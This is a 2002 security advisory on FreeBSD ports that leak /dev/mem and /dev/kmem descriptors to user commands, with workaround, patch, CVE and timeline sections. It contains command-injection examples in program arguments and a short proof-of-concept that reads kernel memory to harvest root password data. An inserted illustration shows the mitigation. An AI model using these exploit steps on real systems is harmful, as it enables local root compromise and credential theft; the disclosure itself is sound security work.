
FreeBSD Ports libkvm Security Vulnerabilities

09.16.02

BACKGROUND

The FreeBSD Project's FreeBSD Ports and Packages Collection offers a simple way for users and administrators to install applications. More information about it is available at http://www.freebsd.org/ports/.

DESCRIPTION

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be manipulated by a local user to take advantage of open file descriptors to /dev/mem and /dev/kmem and gain root privileges on a target host. These five programs are installed setgid kmem by default. They drop kmem privileges before executing user-specified commands, but the file descriptors to /dev/mem and /dev/kmem remain open and are inherited by those commands. This can lead to a local root compromise in various ways (e.g. if an attacker chooses to scan for the master password file in the Linux kernel memory).
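As an added illustration (not code from the advisory or from the affected ports), the following C stand-in shows the pattern described above beside one standard mitigation: a descriptor opened while the program still holds the kmem group stays usable by the user-supplied command after the group privilege is dropped, unless it is marked close-on-exec (or closed) before the exec. It opens /dev/null in place of /dev/mem and /dev/kmem so it runs unprivileged, and assumes /bin/sh is present.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the descriptor libkvm opens on /dev/mem; /dev/null here
 * so the example runs without the kmem group. */
int open_stand_in_device(void)
{
    return open("/dev/null", O_RDONLY);
}

/* The mitigation: mark a descriptor close-on-exec so it does not survive
 * into a user-supplied command. Returns 0 on success, -1 on error. */
int mark_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1 ? -1 : 0;
}

/* Run cmd through /bin/sh -c, as the affected ports run the user's
 * command. Returns the child's exit status, or -1 on failure. */
int run_via_shell(const char *cmd)
{
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Probe: 1 if a command spawned from this process can still use fd after
 * exec, 0 if not. The redirection ": >&fd" exits non-zero when fd is
 * closed in the child, so the exit status reveals the leak. */
int child_can_reach_fd(int fd)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, ": >&%d", fd);
    return run_via_shell(cmd) == 0;
}

int main(void)
{
    int fd = open_stand_in_device();
    printf("before FD_CLOEXEC: child sees fd %d? %d\n", fd, child_can_reach_fd(fd));
    mark_cloexec(fd);
    printf("after  FD_CLOEXEC: child sees fd %d? %d\n", fd, child_can_reach_fd(fd));
    return 0;
}
```

The first probe reproduces the leak the advisory describes (the child still holds the descriptor); the second shows the descriptor gone once it is marked close-on-exec.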

ANALYSIS

The following examples illustrate the vulnerabilities:

ascpu

bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bubblemon

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

wmmon

bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"
bash-2.05a$ wmmon &
[1] 793
bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

wmnet2

bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem


One possible exploit for these vulnerabilities is to replace getch() in strings(1) with:

#include <stdio.h>   /* EOF */
#include <unistd.h>  /* read() */

/* Read one byte from descriptor 4, the inherited /dev/mem descriptor
 * (see the lsof output above), instead of from the input file. */
int getch()
{
	char buf[4];
	if (read(4, buf, 1) != 1)
		return EOF;  /* end of input or read error: let strings(1) stop */
	return buf[0];
}

or a similar, less CPU-expensive function that reads a character from the /dev/mem file descriptor, and then execute the following:

wmnet2 -e exploit|grep root|grep Charlie

DETECTION

The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the FreeBSD ports collection are vulnerable and were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD, all FreeBSD ports that use libkvm before and including 4.6.2-RELEASE may be vulnerable.

WORKAROUND

Remove the setgid bit on the affected applications via the command chmod g-s /path.to/wmnet2.

VENDOR RESPONSE

FreeBSD advisory FreeBSD-SA-02:39.libkvm, which is available at ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:39.libkvm.asc, provides the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27)."

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1125 for these issues.

DISCLOSURE TIMELINE

08/12/2002 Issue disclosed to iDEFENSE
09/06/2002 FreeBSD Security notified
09/06/2002 iDEFENSE clients notified
09/16/2002 Coordinated public disclosure by FreeBSD and iDEFENSE

CREDIT

badc0ded (badc0ded@badc0ded.com) is credited with discovering these vulnerabilities.